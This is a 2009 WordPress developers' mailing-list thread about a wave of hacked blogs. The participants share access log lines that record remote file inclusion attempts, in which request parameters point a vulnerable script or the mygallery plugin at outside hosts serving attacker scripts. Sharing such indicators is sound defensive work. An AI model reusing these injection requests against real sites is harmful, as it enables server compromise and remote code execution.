[wp-hackers] Hacked blogs
Dougal Campbell
dougal at gunters.org
Thu Mar 26 14:24:48 GMT 2009
Joost de Valk wrote:
> Peter van der Does wrote:
>> On Thu, 26 Mar 2009 13:12:44 +0100
>> Joost de Valk<joost at yoast.com> wrote:
>>
>>
>>> Hey guys,
>>>
>>> I've been restoring 5 hacked blogs the last few days, all running
>>> 2.7.1 but spread over different hosts, can't find the hole yet that
>>> they're getting in through, but I'd thought I'd send out a warning to
>>> all of you that something seems to be wrong...
>>>
>>> Best,
>>> Joost
>>>
>>>
>> Do you have more info about the similarities of the blogs, like themes
>> and plugins?
>> Maybe even PHP, Webserver and MySQL versions?
>>
>>
> No similarities there, PHP4 and 5, MySQL 4 and 5, Apache 2.0.54, 2.2
> etc....
>
> Files like this:
>
> http://oursoultvxq.com/bbs/data/vip/id.txt
>
> Show up in the access logs in some cases though:
>
> 84.40.23.30 - - [22/Mar/2009:18:04:33 +0100] "GET
> /boek/?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 200
> 23128 "-" "libwww-perl/5.79"
>
I dont' see that particular request in my logs, but I see lots of
attempts against a 'mygallery' plugin (which I don't have installed).
They all get a 404, of course, but I'm guessing that this means that the
'mygallery' plugin needs to be looked at.
78.111.71.6 - - [25/Mar/2009:22:25:49 +0000] "GET
/blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
78.111.71.6 - - [25/Mar/2009:22:25:49 +0000] "GET
//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
78.111.71.6 - - [25/Mar/2009:22:25:50 +0000] "GET
/blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
124.0.73.2 - - [26/Mar/2009:01:24:32 +0000] "GET
//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vietnamwingchun.com//fastidioid.txt?
HTTP/1.1" 404 28407 "-" "libwww-perl/5.805"
124.0.73.2 - - [26/Mar/2009:01:24:34 +0000] "GET
/blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vietnamwingchun.com//fastidioid.txt?
HTTP/1.1" 404 28407 "-" "libwww-perl/5.805"
Though these particular examples all used libwww-perl as the useragent,
other hack attempt entries in my logs masqueraded as normal MSIE
browsers. Personally, I think blocking the LWP useragent outright is a
bad idea, because plenty of legitimate tools use it. It's like blocking
'curl' or 'wget'.
--
Dougal Campbell <dougal at gunters.org>
http://dougal.gunters.org/
http://twitter.com/dougal
http://twitual.com/
*Hire me!*
More information about the wp-hackers
mailing list